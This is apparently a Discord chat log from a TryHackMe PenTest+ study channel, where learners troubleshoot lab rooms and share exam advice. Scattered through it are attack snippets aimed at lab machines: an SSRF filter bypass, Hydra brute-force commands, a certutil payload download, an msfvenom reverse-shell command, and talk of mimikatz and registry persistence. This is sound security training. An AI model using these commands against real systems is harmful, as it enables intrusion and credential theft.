That didn't help. What helped: reinstalling ssh client. But thx for your help
Gave +1 Rep to @cosmic pecan
Hi, wanted to know if anybody can tell me how to get to admin area in the SSRF section of the owasp_top10_2021_v1.2 room. Could not figure it out.
Simply change the value of the server to point to your attacking machine, you could just capture the contents of the request using Netcat: nc -lvnp 80
I am not able to run mimikatz.exe in the Persisting Active Directory room. When I run it, it just gets stuck. I tried resetting/starting after some time, all resulting in the same issue. Can anyone help me get through this?
[SOLVED] I tried C:\Tools\mimikatz_trunk\x64\mimikatz.exe but it didn't work, then tried C:\Tools\mimikatz_trunk\Win32\mimikatz.exe, and it worked perfectly
What do you mean by change the value of the server?
As you can see, there is a download functionality in the webpage.. Intercept the request through burp, then click on download. You will be able to see the request in burp.
As you can see, the ?server parameter points to a domain. Now we will change the value to our attacking machine's IP address. Before that, we need to run a listener on port 8087 as the website is running on port 8087. Now send the request
Keep hitting forward, now check your terminal. You will receive the flag.
I did that and received the flag. What I mean is the extra challenge after that. Getting into the Admin Area.
Apologies for the misunderstanding
so instead of pointing the server parameter to your attacking machine, we are going to point it to the admin page.. generally admin pages can be accessed only from localhost. So change it to.. http://localhost:8087/admin ..
- lets try to delete the id parameter and send the request, but we get an error saying file not specified (assume there is a mechanism thats validating id parameter)
- So lets use '#' before the id parameter.. so it will go like this.. server=http://localhost:8087/admin#&id=something
This will not consider the part that's after the #. - If that still didn't work, let's try to encode the #, assuming that there might be a blacklist..
encoding # we get %23..
so the url goes some what like this
server=http://localhost:8087/admin%23&id=something
This will get the job done..
Try to understand the concepts and the mechanism.. We need to assume the mechanism used at the server side and perform the attacks.
thx for your help. Shall I brute force the id? I tried 0 to 10 and always get a PDF file encoded.
Gave +1 Rep to @cosmic pecan
You don't have to bruteforce the id parameter. You have to access the admin page.
You will find the flag once you access it
I am solving a lab called Phishing
And I am not getting the password back to answer the Question asked inside the lab.
Did you get it to work at all?
I have closed the machine
should I do it one more time
I'm not sure, I was just going to try it to see if I ran into the same issue as you
Okay
Please Let me know
Ya it worked for me
not to sound stupid, but did you hit refresh (the blue button, not the page refresh) at the top after a bit?
yes
Ya mine gave the password after a min
did you create the phishing email just like in the walkthrough? It said to craft a convincing one, so I wonder what would happen if it wasn't convincing haha
What have you written?
I wrote exactly what was in the walkthrough
Me too
Hmm. Not sure. Maybe try going back through it again. Maybe the server was being weird. I know the page froze once for me, i had to refresh and start over but luckily I was at the first step
I have done it more than 10 times
oh.. well hmm..
yup
If you're able and willing to, you can try screensharing while you do it and we can walk through it together to see what's up
Glad we could get it working for you.
Mscteacher
Thank you!!
Gave +1 Rep to @keen dew
Guys, I don't understand, do people actually remember all this stuff? 😮
I barely remember anything from the rooms in this learning path
Ah, I overlooked the Prerequisites: "and have studied the theoretical knowledge in the CompTIA PenTest+ syllabus to complete this pathway."
You don't need to memorize these. Understanding it should be sufficient
Oh okay 🙂
Like a lot of stuff in Computing / Cyber (and any engineering type job), understanding is the key.
Know what to do with the info when you get to it, know where to find it.
Learn it by heart when you've got to go do 100 multi-guess questions for a shiny cert haha.
I googled the error message and found the below -
Thanks, I solved it, I just moved the python file to a different location and it works, no idea why
Gave +1 Rep to @vapid cipher
Repetition helps. For example I took a CEH (certified ethical hacking) course, then started this track while reading the All in One book to pass the cert exam. Doing this was a lot easier for me than taking the time to set up a home lab like I am supposed to do. Then I also found an 11hr PT+ video course on YouTube that reviewed some but also covered a LOT I had either missed, forgotten or never really understood. I have not finished the track here yet but I did squeak a pass on the PT+ exam last week, so I can say there IS hope if you just stick with it & give it time to sink in, and keep repeating stuff.
Wow great job, and thanks for the motivation! I think I'm going to finish all Learning Paths on THM and then go over all of them again for a refresher
Gave +1 Rep to @wise haven
@fading tartan win some lose some. If you look back at a room & feel like someone else must have done it, don't be shy about resetting the room progress & doing it again. I just did a CTF over the weekend and way back at the beginning of my CEH labs I did a lab using Sysinternals but drew a total blank on it in the heat of the CTF, so I missed several flags that "should have" been gimmes. TL;DR: forgetting stuff is 100% normal. Spaced repetition is one of the best ways to really learn & remember, meaning multiple repetitions. Even if you are self-study you can use Quizlet's free online sets to review concepts chapter by chapter if you are more used to linear learning.
OTOH, last year I got exactly ONE flag at the same CTF. This year I got over 1000 pts. Not enough to move to the next round but a decent improvement.
I've gone over Windows Persistence about 3x to create a writeup for my uni channel (obvs no flags), really enjoying the pathway. Persistence is a beast lol.
Really good advice here. Am plugging away at the PT+ pathway! Really enjoying it.
Ugh, getting super stuck on this task in the OWASP Top 10 - 2021 module! Can't figure out how to edit the cookies, there doesn't seem to be an option in Firefox developer tools that I can see 😦
Anyone got a tip for me? Really don't want to just look up the answer!
ugh, finally I found the answer: double click it, there is no right-click edit option like in other browsers and older versions.
Ikr
I'm having issues with the Breaching Active Directory. Task 4. The rogue LDAP server isn't working.
Anyone with a clue on setting it up correctly? I followed the step as best as I could.
Not on there yet!
Oh well...guess I'll just move on to the next room till i have the patience to figure it out.
I so wish I could do that 🤣🤣🤣 I basically fixate on one till I complete it. Honestly think this is an obsession 🤣
😂😂💔 I do that too and there's nothing wrong with being fixated on a particular issue till you solve it, but you need to know when you're going in circles and not getting anything done.
Yea, I normally go to bed at that point because I'd been on a box all night and the cockerels were calling 🤣
Had a couple days off from here as work is nuts atm. Plus Uni work and kids 🤣
😂 good times. Finally completed the room this morning. On to Linux PE.
Work is thankfully quiet this morning.....so am jumping on now 😁
Good luck...you got this!
On task 6/9 of Windows Persistence, weird, something just clicked and I realised - hold on, I'm sending / receiving reverse shells to machines and it's comfortable. Had a few issues with Tampering with Unprivileged Accounts tbh. It just didn't seem to click for ages and then it did today and I flew through the rest
Great! Have fun 😁 and don't forget that with great power comes great responsibility.
Meh....I'm only for the light side of the force anyways lol
I'd like to be a part of the ones who catch the "other side" lol
LoL yeah, I mean...isn't that what we're learning for?
Don't know, I get the feeling not everybody is on that side of the fence lol. Disgruntled employees are a big problem!
I finished persistence. May jump on tonight tbh. It was fun in all fairness. Backdooring files is a good room
Does anyone know why the provided directory enum python script would give me this error? 'requests' has no attribute 'get'
This is for the Python for Pentesters room
I just did it from my own Kali vm. The AttackBox has a bunch of issues.
I found that on flag 13 of the registry task.
I followed everything to the tee, created a shell (correct LHOST + LPORT) Then sent the shell to the target machine and saved in C:\Windows - then put the filepath in the value of the reg entry - opened a nc listener on the same port as LPORT on the revshell.exe - signed out - reconnected and the shell let me in - travelled to C:\flags and ran the flag13.exe
Sorry it appears you are missing something..... 🤔🤔 it might be the machine itself so will try again today.
Try resetting the target and attack machines, it may just be a bad session.
I'm going to jump on in 20 mins. I'll let you know how it goes.
It was the previous machine - got the flag first time 🙂
Finished! AD next 👌
Yeah, it is. That part was fun.
Great! I'm occupied so I haven't gone far. Still at Linux PE. Keep me posted on your progress.
Will do.
The Breaching AD room NEEEEEEEDS time.
You have to do the room in one go. And if you leave you need to start again 😬 so I'd set aside a good day for that room to give yourself time to complete it and work through any issues.
The breaching room can be done in a day.
Alright.
Yeah, if you don't have other things going.
Hey, quick question on the Wireshark section. Finding the alien's name in a text file. I have a text file with an alien image in it but I can't see a name... is this the correct text file? On the question before, it was finding the text in packet 12; I followed the instructions, had an image and went to the properties, copied in what I thought was the answer but it says incorrect. Any tips for either of these? Thanks
Don't have it in front of me but I think you have to scroll down.
IIRC, you either scroll down, or zoom out.
Maybe zoom out.
Thanks both, I did scroll down and there was a word like master or something in bold but it never had the correct amount of characters for the answer. I'll try again later on and let you know.
Anyone know the password for the Windows server VM CredsharvADV1 in Task 4 - Credential harvesting? It's blank fields for me under 'machine information'
Sorry, I'm not up to that point yet.
anyone done active reconnaissance yet?
task 6 I can not nc ip 21 at all
anyone had same issue?
Hey guys, can somebody share the comptia pentest+ practice papers ?
It's on Cyber Vista
Thank you bro
Gave +1 Rep to @vast vector
anyone done nmap basic port scans task 5?
there is no new port open. so whats the answer here?
Please help
Still need help?
I have this problem: it doesn't accept my answer
Have you tried to retype the second -?
yes, I did it and it works, thank you
can someone help me with governance and regulation in planning and scoping room? It is question 3 in NIST special publications
"Which phase (name) of NIST 800-53 compliance best practices results in correlating identified assets and permissions?" Answer format is 3 characters
i cannot figure it out for the life of me
false alarm i figured it out by rereading
If an AP has 802.11r, is it certain that it broadcasts the PMKID? If not, how does roaming work without the PMKID?
Hello everyone, i was wondering. Is it possible to switch from a Powershell reverse shell to a cmd reverse shell ? If yes any advice on how to do it ? Thanks !
By 'switch', what do you mean exactly?
Hello 🙂 i mean to execute cmd commands from powershell
I am not really sure, but on cmd itself you can execute the command named "runas"; perhaps in powershell you can switch back to cmd using this
I believe the command is "runas /u:[Current-user] cmd.exe"
You would however need the password for this user
@willow berry
If the syntax is incorrect please google the correct one, I can't remember it off the top of my head
Can anyone help with THC Hydra on Kali Linux?
What kind of help do you need?
I need help with a brute force attack in DVWA
It Keeps showing all of my passwords as valid
What tool are you using - hydra? And can you share your entire command?
I'm using Hydra
sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt -u -f 127.0.0.0 -s 80 http-get-form "/DVWA/vulnerabilities/brute?:username=^USER^&password=^PASS^:F=<input name='Login'"
This syntax generates data, but it will go for hours (10 or more) and I don't see if the password was found
sudo hydra -l admin -P /usr/share/pswords.txt -u -f 127.0.0.0 -s 80 http-get-form "/DVWA/vulnerabilities/brute?:username=^USER^&password=^PASS^:F=<input name='Login'"
I created my own password list and it comes " 0 valid password found"
You don't need to add -s if the web page is running on port 80. Also, you don't need to add sudo to run hydra.
Are you sure you have the first parameter correct (as it has ? at the end)? And the third parameter, it usually is for the error message in case of incorrect login.
let me check
I have been trying several different ways to do this
hydra 127.0.0.0 http-post-form "/DVWA/login.php:username=^USER^&password=^PASS^&Login=submit:Login failed" -l unames.txt -P pswords.txt
This one gives me this.....
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-11-12 21:18:53
[DATA] max 8 tasks per 1 server, overall 8 tasks, 8 login tries (l:1/p:8), ~1 try per task
[DATA] attacking http-post-form://127.0.0.0:80/DVWA/login.php:username=^USER^&password=^PASS^&Login=submit:Login failed
[80][http-post-form] host: 127.0.0.0 login: unames.txt password: Heroes
[80][http-post-form] host: 127.0.0.0 login: unames.txt password: password
[80][http-post-form] host: 127.0.0.0 login: unames.txt password: Password
[80][http-post-form] host: 127.0.0.0 login: unames.txt password: pass12345
[80][http-post-form] host: 127.0.0.0 login: unames.txt password: Save the Cheerleader
[80][http-post-form] host: 127.0.0.0 login: unames.txt password: Timex
[80][http-post-form] host: 127.0.0.0 login: unames.txt password: Boom
[80][http-post-form] host: 127.0.0.0 login: unames.txt password: Stealing Powers
1 of 1 target successfully completed, 8 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-11-12 21:18:54
Here is what I have from Burpsuite......
POST /DVWA/login.php HTTP/1.1
Host: 127.0.0.0
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: http://127.0.0.0
Connection: close
Referer: http://127.0.0.0/DVWA/login.php
Cookie: PHPSESSID=dh1h9ohncir26mhrr7p7f895aj; security=low
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
username=test&password=test&Login=Login&user_token=c06a3c7a4cee9d107f935c3c1f7e623e
You need to supply -l or -p if you are providing a name and password, otherwise -L and -P will take a list and iterate using a combination of each.
If you are providing a list, make sure you provide the full or relative path, unless you are running hydra on the folder or directory where you have the user and password list.
I tried that too and it made all of my passwords valid
i had hydra -L /usr/share/unames.txt -P /usr/share/pswords.txt ........
It is due to one of your parameters being incorrect.
gotcha
I'm just not sure which one
hydra 127.0.0.0 http-post-form "/DVWA/login.php:username=^USER^&password=^PASS^&Login=submit:Login failed" -l /usr/share/unames.txt -P /usr/share/pswords.txt
I just ran that one
You can refer to this to help you -
https://infinitelogins.com/2020/02/22/how-to-brute-force-websites-using-hydra/
I'll check it out
You still having issues with hydra ? When the entire word list comes back valid it's usually because the failed login response is incorrect. What room are you in ?
Hi guys, I'm starting the Linux Privilege Escalation chapter and I'm trying to SSH to the Enumeration machine in Task 3 but the connection is hanging at debug1: SSH2_MSG_KEXINIT sent. Pinging the IP is successful. Any ideas?
Can you try adding -vv in your SSH command?
Yes that is how I saw the error to begin with 😅
Can you provide the link to the room as there are at least 4 Linux Priv Escalation rooms?
Thanks yeah I saw this same post earlier and tried running the dpkg-reconfigure command suggested in the first answer but it didn't seem to work.
I figured I'd check to see if I could connect to another THM box via SSH, so I ran ssh -vv thm@THMJMP1.za.tryhackme.com in the Breaching AD room, which I did yesterday, and it is working, and I'm not seeing any visible differences in the debug info leading up to the sending of the key exchange init.
You suggest moving the conversation over to that channel?
No, if you click on that, it will point you to the command you need to run to possibly resolve your issue.
Ok thanks, having a look now.
@vapid cipher lol it worked 🙌
Thanks for your help. I will be sure to check that channel if I ever run into anything like that again!
Just do a search on MTU across the discord and it should work.
I am not sure I am in the right room but I have an issue. I am doing the breaching AD room, and when I try to password spray it's just not working, Error:
equests.exceptions.ConnectionError: HTTPConnectionPool(host='ntlmauth.za.tryhackme.com', port=80): Max retries exceeded with url: / (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f805ddc4b38>: Failed to establish a new connection: [Errno -2] Name or service not known',))
I'm stumped. In rooms like Persisting Active Directory where you have to connect to the Persistingad network, I can't get nslookup thmdc.za.tryhackme.loc(or .com) to work.
Results: nslookup thmdc.za.tryhackme.loc
Server: 127.0.0.53
Address: 127.0.0.53#53
** server can't find thmdc.za.tryhackme.loc: NXDOMAIN
I got it to work on one of my Kali boxes on my laptop but not on my desktop. I tried to Google and GPT for help but I'm at a complete loss
Have you tried posting this in the #persisting-ad channel? You might get more feedback in there.
does anyone know how much Governance & Regulation is on the exam?
Have you referred to the exam syllabus?
not yet, do you have it?
It should be available in the CompTIA site.
ok thank you
hello, I am doing Windows - Lateral Movement and Pivoting - Abusing User Behaviour. I cannot get the credentials at http://distributor.za.tryhackme.com/creds_t2 to start the task. The network state is running and started. openvpn is on. Had no issues connecting with the network until now. Can't connect to server...
Are you using the correct openvpn profile for the network? And did you add the IP address of THMDC to your dns server config? Oh, seems you've been able to connect up till now.. You might want to wait for the network to time out and go into Stopped state. Then Start the network fresh.
I went through this two days ago btw.
Hello, I'm having trouble in Credentials Harvesting. In Task 4, we are supposed to be able to move SAM and SYSTEM from the windows machine to Attack-box. Instructions say SCP should work. But I keep getting Permission Denied on my SCP command. I'm using the same credentials that I'm using to RDP to the VM.
can't even get the credentials from
http://distributor.za.tryhackme.loc/creds
Requesting Your Credentials
To simulate an AD breach, you will be provided with your first set of AD credentials. Once your networking setup has been completed, on your Attack Box, navigate to http://distributor.za.tryhackme.loc/creds to request your credential pair. Click the "Get Credentials" button to receive your credential pair that can be used for initial access.
so I assume the network needs resetting
Which room/subnet?
I'm having similar issues with the Lateral Movement room, openvpn was working until this morning and now I'm getting ERROR: Cannot ioctl TUNSETIFF lateralmovement: Device or resource busy (errno=16). Tried using the attackbox, I can ssh into the jumpbox, but the connection gets reset after about 10 secs and it's super slow for those 10 secs
hello champs
You can do this within the AttackBox after running the systemd-resolve command to enable DNS
how long does it take for Lateral Movement and Pivoting room network to reset?
Hello
hi, https://tryhackme.com/room/nmap01 the answers to the questions of task 7 are wrong.
Which question?
the accepted answers to the first two questions are reversed
Windows Local Persistence > Task 4
Running THMservice says: The service did not respond to the start or control request in a timely fashion.
Running THMservice2 says: The file or directory is corrupted and unreadable.
If I remember this one, I read that you'll have to complete it from the first one all the way to the end so you can't stop mid way and simply continue the remaining ones on the following day or session.
So i guess a few weeks won't work either 
Yeah, you gotta do it in one continuous session.
right, thanks man
Gave +1 Rep to @vapid cipher (current: #17 - 404)
I'm having an issue with the lateral movement and pivoting room. I am starting the attack box inside the room and the network is up, but my attackbox apparently isn't on the same network as the room. I can't ping the DC and, understandably, when I run the command to configure the DNS I get the error "Unknown interface lateralmovement: No such device". Is there a way to fix this or am I missing something?
Hi people, before moving to the Pentest+ path which paths should i have completed? Junior Pentester?
There is a recommended path here in the discord. Let me look for it.
Thank you
Thank @true frigate instead as it's her recommendation.
Gave +1 Rep to @plucky vector (current: #2004 - 1)
haha
I'm doing the Windows Local Persistence room right now, and in Task 4 I need to copy a payload to the Windows machine. I tried a Python web server but wget just shows "number of bytes read: 0".
So I tried to set up an SMB share to access the file, which I can access from the Windows machine, but the file doesn't get copied... Running out of ideas; does anybody have a suggestion what I can try?
try certutil
How? 😄 I never used it before.
certutil -urlcache -split -f http://10.x.x.x:8000/path/to/your/file output_filename
otherwise just google it
thanks, will give it a try
Alternatively, if your shell is PowerShell the wget command should work, but you will need to specify -O output_file for it to work, as it is an alias for Invoke-WebRequest in Windows.
Yeah, I know. Kinda strange: certutil executes completely but the created file is 0 bytes... not sure what I am missing.
Are you specifying the right port?
Are you specifying the right IP?
And the correct path for the file hosted using python -m http.server?
Yeah. Also tried scp now: the file is found but doesn't copy at all, just stays at 0 bytes.
Can't even RDP into the machine. Seems strange; I think I'll grab something to eat and try again afterwards with a new machine.
Or try the AttackBox instead of my VM.
@true frigate not sure why, but from the AttackBox it worked without any problems. Just wanted to let you know; got distracted before and tried just now.
I was following this step from the Exploiting AD room and ran mimikatz.exe from x64 and it throws this error. How can I fix this issue? Please help me, I'm stuck here.
.\mimikatz.exe
Program 'mimikatz.exe' failed to run: The specified executable is not a valid application for this OS platform.
At line:1 char:1
+ .\mimikatz.exe
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
I forget if it was in Exploiting AD or another AD challenge, but I had the same error as you; I tried the 32-bit one and it ran.
tysm bro
I ran the 32-bit one too and thought it didn't work. But now it worked somehow.
Hello!
Is there anyone who can help me with why I can't delete the SD registry key in the Windows Local Persistence module Task 5? I have followed the instructions, yet I get this error.
NCIIPC-AICTE with the Government of India is organizing a Pentathon (Penetration Testing Hackathon) whose CTF Round 1 is going to start in the next 1 hr, before midnight 12, and we need a partner who is familiar with CTF. He should be in a college (India) and the college should be affiliated to AICTE. Please don't hesitate to give me a call; we are running out of time.
https://www.comptia.org/certifications/pentest
Beta exam registration starts on May 24
Are there any requirements? I'd do it just for fun
No requirements. I'm doing SecurityX "CASP+" and Pentest+. I'm planning on passing the Pentest+ and just doing SecurityX for the experience.
SecurityX? That's new
Yes, the new name of the CASP+
I see. So that should renew sec+ and net+ unless rules changed as well
Yes, it will.
I might be hanging over here while I study using the path in THM. I hope I get to see you around.
Please vote for the resetting of AD network. It ain't workin' as expected
You can also give 1 vote for every hour I think.
No. 1 vote per paid THM user
No, one vote per hour for each user.
You can add 5 votes over 5 hours.
Any French speakers who want to do some hacking together?
hi, English only this server please.
PenTest+ is a serious exam --- I passed the 1st time out --- you gotta get serious in organizing your notes, study questions, and frame of mind ... there are a lot of situational questions that only an experienced pen tester would know ... always narrow it down to 2 possible answers and really ask yourself which is correct by analyzing the question being asked ...
I'm taking the exam Monday. Any more wisdom you'd be willing to share?
Good day, I am a newbie to pen-testing. Please can someone give guidelines to follow on how I can be a pen-tester, and also some necessary lessons I should take?
Also, is there any necessary programming language I should learn?
Do visit the #start-here channel.
Good luck, let me know how it goes.
How did it go?
Passed with 796
Congratulations 🎊 🎉
This is good news. I'm taking my exam in a couple of months! What would you rate Dion's training and THM training for PenTest+?
Posted my full experience here: https://www.reddit.com/r/CompTIA/comments/1d7fv3x/passed_the_pentest_pt0002_exam/
But the short version is that THM is great for hands-on learning, especially the Nmap rooms because of how prevalent they are in the actual exam. I watched the Dion videos, but I was already about halfway through two study guides at that point, so it was a lot of review for me. I couldn't accurately say how well they work as a primary resource. If you're using Dion's 6 practice exams, those are awesome!
Hey, is there anyone out there who can help? I'm having confusion in Attacks and Exploits > Lateral Movement and Pivoting > Task 3 > Let's Get to Work!
If the target user's creds are already given, can't we simply SSH into it rather than complicating things like what's mentioned?
Did you pass
Steel Mountain lab manual exploitation is not working. Is it a bug or what??
In which part are you? Are you using your VM or Attackbox?
@vapid cipher I'm at the manual exploitation phase; tried both VM and AttackBox.
The exploit provided on TryHackMe is not working. I had to find a new one, https://www.exploit-db.com/exploits/49584, and only then was I able to get a reverse shell, but I'm not able to escalate to administrator.
For which room?
Steel Mountain
Oh, that's common.
Oh.. the unquoted service path?
yes
Steel Mountain isn't in this path, which is why I was confused.
You generated the payload using msfvenom?
yes
Got the correct architecture?
system was 64bit
but I used the THM recommended msfvenom shell: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.12.249 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
In which directory did you place the payload?
Advanced SystemCare
Later I was not able to stop the service AdvancedSystemCareService9
by sc stop AdvancedSystemCareService9
Did you complete this lab? If so, when?
I just want to know if there is something wrong with this lab itself or something else.
It's been months... but definitely during the earlier part of the year, and I got it working.
Aahh.. this is the reason why you can't run the exploit correctly. You need to stop and start the service to get the shell.
Do check the Sushant Windows privilege escalation cheat sheet if the steps listed there for unquoted service path (stopping and starting a service) would work.
Where can we have a cheat sheet Please?
This room https://tryhackme.com/r/room/burpsuitebasicsold in the Tools and Code Analysis module of the CompTIA PenTest+ path should be updated to https://tryhackme.com/r/room/burpsuitebasics, I believe.
You can do a Google search on Sushant Windows Privilege Escalation.
SQL injecting
Hi, I am stuck on Burp Suite: Basics, Task 13: Site Map and Issue Definitions. I did the setup, following the Firefox + Burp settings, Burp target scope, and certificate. But when I am targeting my attack machine IP address the website is not coming up. Any suggestion what I should try next?
Are you using the correct IP?
Are you using HTTPS?
I am using the attack machine address.
I tried both. But only the PortSwigger page is coming up.
Can I have the IP please?
Heyho,
In the AD Persistence room I can't get mimikatz to work on the Windows machine. Every time I start mimikatz the console doesn't react to anything anymore, for longer than 10 minutes now.
Did the mimikatz binary come with the room? Have you tried uploading a different binary for it?
Haven't done the room though, but that is what I would consider doing.
Try a different binary.
Yes it comes with the room
Try a different one.
In the Windows Local Persistence room Task 3, hijacking file associations does not seem to work when changing the txtfile registry value to what is given by those who wrote the room. For me it would only work if I removed the %1 (leaving 'powershell -windowstyle hidden [path to reverse shell script]'), which is supposed to pass a parameter to the PS script.
Just passed the Pentest+! with a 762
Hi, anyone know why I can't crack the hash in Breaching AD with hashcat on the AttackBox?
I'm using hashcat -m 5600 hash.txt Password.txt --force
Don't use --force
What is your command?
Hey! I'm starting to study for PenTest+ now and I'm planning on taking the exam by the end of April, should I prep for the 002 version or the 003?
What resources did you use, I’m thinking of doing pentest+ soon
I just did practise tests on udemy tbh
Just went in with prior knowledge from my job and some practise tests and did it in a day
Truthfully though, I've not been finding the cert very useful so far.
Maybe look at the retirement date for 002? In any case, you couldn't go wrong with sitting for the new version 003.
It's retiring this June and the new version was released like two weeks ago so I just wasn't sure on what to do
Windows Local Persistence / Hijacking File Associations /
I have checked the script, it works. However, it does not run when opening a text file. I have followed the path and multiple walkthroughs; I think it has something to do with the regedit command? Anyone figure this out?
Windows Local Persistence / Creating Backdoor Service /
error:
Program 'rev-svc.exe' failed to run: The specified executable is not a valid application for this OS platform. At line:1 char: 1
PS C:\> sc.exe start THMservice2
[SC] StartService FAILED with error 216
Any ideas on this?
It seems maybe this room might need a refresh on the tutorial.
I can get the msfvenom powershell version to run and connect, however, the flag.exe file will say
Sorry! You are still missing something. No flag for you yet (1)
not sure what is expected here.
Which room 🙂 ?
Microsoft Local Persistence / Creating Backdoor Service
I was able to get it to work through a WINRM instance rather than the RDP instance. The path seems to allude to using the RDP instance for cmd, but I'm not really sure.
started doing this path today
knocked out the first 3 rooms. All pretty easy stuff.
Congrats , keep up the good work 🙂
🚀
Thanks! Wanted to get the easy stuff knocked out today. Did those 3 rooms, then knocked out the 3 windows and 3 linux fundamental rooms.
I'll start up the Tools and Code Analysis portion later today or tomorrow morning.
Mostly posting for my own accountability.
Keep up the good work 😄
finished Metasploit: Intro and Wireshark: The Basics
Goal for tomorrow is to finish the rest of this section.
Congrats , great job 🙂 🚀 . Keep up the good work 🙂 💪
finished burp suite and hydra. found the hydra stuff quite easy to grasp. burp suite went well but I ran into an issue in Task 10 that hung me up with getting the url to include after the ip. figured it out sort of but it was a struggle.
Python Basics and Python for Pentesters is left on the agenda for today. Mildly intimidated by it.
Congrats, great job 🙂 🚀
Didnt get to Python last night so doing it today.
Mostly continuing to post for my own accountability
Keep up the good work 🙂
Python for Pentesters finished. Took me an hour. I had to look up a couple of answers towards the end when being stumped. I'll have to dig deep later and go back over again to get a better understanding.
Is that common, that room just seemed so much more challenging than anything else.
Congrats , great job 🙂 🚀 .
Yeah , this a bit more advanced room 🙂
makes sense. the back half was demoralizing
Slow couple days but I've knocked out passive reconnaissance, active reconnaissance, and nmap live host discovery
Going to at the very least knock out: nmap basic port scans and nmap advanced port scans sometime today and maybe at the very least start attacks and exploits section
I also was finally able to get Kali running on VMWare Workstation Pro so I'm wanting to play around with that some too
Congrats , great job 🙂 🚀, keep going
I think all things considered I'm pacing pretty decent
These modules have been a good start
Yeah, you're doing great, making some pretty good progress 🙂
Finished nmap basic port scans and nmap advanced port scans. Also knocked out http in detail.
Congrats , great job 🙂 🚀 
I'm having the darnedest problem with SCP... should I be using my tun0? I'm getting a connection refused via the tun0, but the exploited Windows box can't ping my VPN'd Kali box... but the Kali box can ping the Windows box.
Are you connected via vpn at all ?
👍
Hi, I'm working on https://tryhackme.com/room/breachingad but I'm stuck with a problem, which is the DNS configuration at the beginning. I'm using a VPS, and I followed the walkthrough and added <THM-PC> to /etc/resolv.conf. I even added a route pointing to the gateway of openvpn, but I still can't ping <THM-PC>. Does anyone have similar experience and can help me solve it?
I had the same problem, I have done it correctly and after 30min of waiting it finally worked.
Hi !
I'm confused about a room, the Hydra room https://tryhackme.com/room/hydra
I was trying to understand Task 2 (Using Hydra) but I'm not quite sure what I need to do...
What exactly you don't understand 🙂 ?
I referred to the Task 1 video, which seems to be well explained. However, when I open the attack box, I follow the instructions to perform a "brute force attack" to answer Question 1.
So I use the following line of code: hydra -l molly -P /usr/share/wordlists 10.10.220.27 -t 4 ssh
which doesn't seem to be the same approach as the video.
And of course, it doesn't output anything at all.
I tried many things but nothing... Clearly I missed something
Can you provide a screenshot ?
You only specified the directory where the wordlists are, but did not put in which file hydra will use as the wordlist - /usr/share/wordlist
Very confused in Linux Priv Esc: PATH. Can someone help me understand where test comes from in /home/murdoch? Trying to follow along with the narrative, but it doesn't seem to work for either user without test, so I don't really understand it. Still researching/playing with it, but any help clarifying is greatly appreciated. TIA!
What do you mean test? Also, what room and/or task are you working on?
Can you share the link to the room you are working on?
Before going into the privesc part of PATH, have you read about environment variables?
Hey
Yeah?
Linux Priv Esc room, Task 10 PATH https://tryhackme.com/room/linprivesc. There is a file in /home/murdoch, called 'test', that needs to be used to complete the task. Why do we need to use the file instead of using the method shown in the text? How are we supposed to know that we need to use it and it isn't just a random file? Was it mentioned in the environment variables and I missed it? I plan to redo the room, but any clarification or points on what I missed are appreciated!
Can't remember this one so I'll have to check when I get the chance.
No rush, I was going to do a few other rooms in the meantime. Give it a few days to marinate before going back to it. I appreciate your time!
what room is it?
red team engagement
Yes but the engagement can’t end if post-exploitation is not fully done though
pentest +
I've been working on the Pentest+ path when my schedule allows for it. Hoping it will be enough to help me prepare for the exam!
Although it's a great resource, I would still combine it with some additional resources like the official exam documentation and maybe a course (many people suggest Professor Messer for CompTIA certs; he has a bunch of free content on YT).
Good luck on your exam btw 🙂 🚀
Thank you! I was definitely planning on doing a bunch of practice tests online to see where I needed to improve.
PenTest+ is actually theory. Some companies may ask for it, but I think it should have some practical scenarios too.
What was the solution here?
Hello everyone. I am having issues intercepting HTTP information with Burp Suite during the Juice Shop module. I tried using the AI assistant but still could not find how to fix it. I would appreciate any assistance. I am currently stuck on the 3rd task and have not been able to proceed due to this situation.
Have you setup your Burp proxy? Are you using foxyproxy?
I am
The issue is solved, so all good. It's just that Burp Suite doesn't display the requests right away.
Takes a while to process. Maybe because I'm using the AttackBox.
@daring shard can you shed some light?
Hey, each flag has a series of checks to ensure it's being run as expected. In this case, your console isn't being spawned by userinit.
If you are doing all the flags one after the other, there's a chance you are catching the shell from another persistence method
I tried to kill the machine and start a new one
so only that shell would return
let me know what should I do
btw pretty cool room!
It seems all is in order... Let me try to reproduce this
thank you!
It works from the attackbox
ok let me try again.
did you do anything else before adding the registry payload?
example: did you add any account?
No, I just followed the room instructions verbatim
I transferred the reverse shell via wget and copied it into C:\Windows
I edited the registry key
I then logged out and logged in and it popped
Note that if you try to manually run the reverse shell, it won't give you the flag. The flag needs to be run from a shell spawned from that specific persistence method
@daring shard Ok, I see, definitely something I did before. Like adding something extra was causing issues.
This time I only ran those commands.
@daring shard thank you.
Hello guys, how can I do more exercises with file inclusion?
Have you done the free rooms in THM?
Hello, so far I've only done the premium rooms from LFI, what else do you recommend?
Try Include challenge room
ok, thx
thank you THM team ! and for helping me prepare for this one!
this is huge! Congrats
Ty
Great job congrats 🙂 🚀
I'm currently preparing for this exam. Besides the PenTest+ path, what rooms/paths/modules would you guys recommend to help me solidify my skills and knowledge for this exam? Thanks in advance!
Congrats! 🎉
Thanks
Hey guys, I haven't done my A+ or Network+ yet. I wanted to know generally how long you have to study for the PenTest+ exam and what the path is like 🙂
I need an intership for pentester
can someone assist with this please,
room: OWASP Juice Shop
Task: 7
Question #2: Perform a persistent XSS!
